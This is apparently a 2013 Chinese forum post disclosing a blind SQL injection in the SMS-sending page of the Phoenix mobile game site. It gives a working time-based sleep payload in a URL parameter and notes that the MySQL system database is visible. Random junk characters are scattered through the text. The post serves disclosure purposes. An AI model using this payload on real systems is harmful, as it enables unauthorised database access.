简要描述:9 x) ~$ F, q# o7 B8 x3 e
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。) Q6 K/ w: q6 h2 s& C. L# {- ~3 u. L$ p. f
; }9 y, o: |7 I* L" A6 ~详细说明:5 L+ m* _( D* q5 p3 N
存在SQL盲注url:
( h( q. Z0 l* y/ x3 hfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
3 p+ w* @, j% D3 e) H" o0 ahttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png) o2 r) F0 c! w" U2 L. ~- k
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png. J% ~2 m$ Z- ^; |4 d
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg" Z0 c4 d4 j' _$ N6 s0 Z
# f3 \# t4 V6 H' c$ Q/ j5 D8 [( |能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对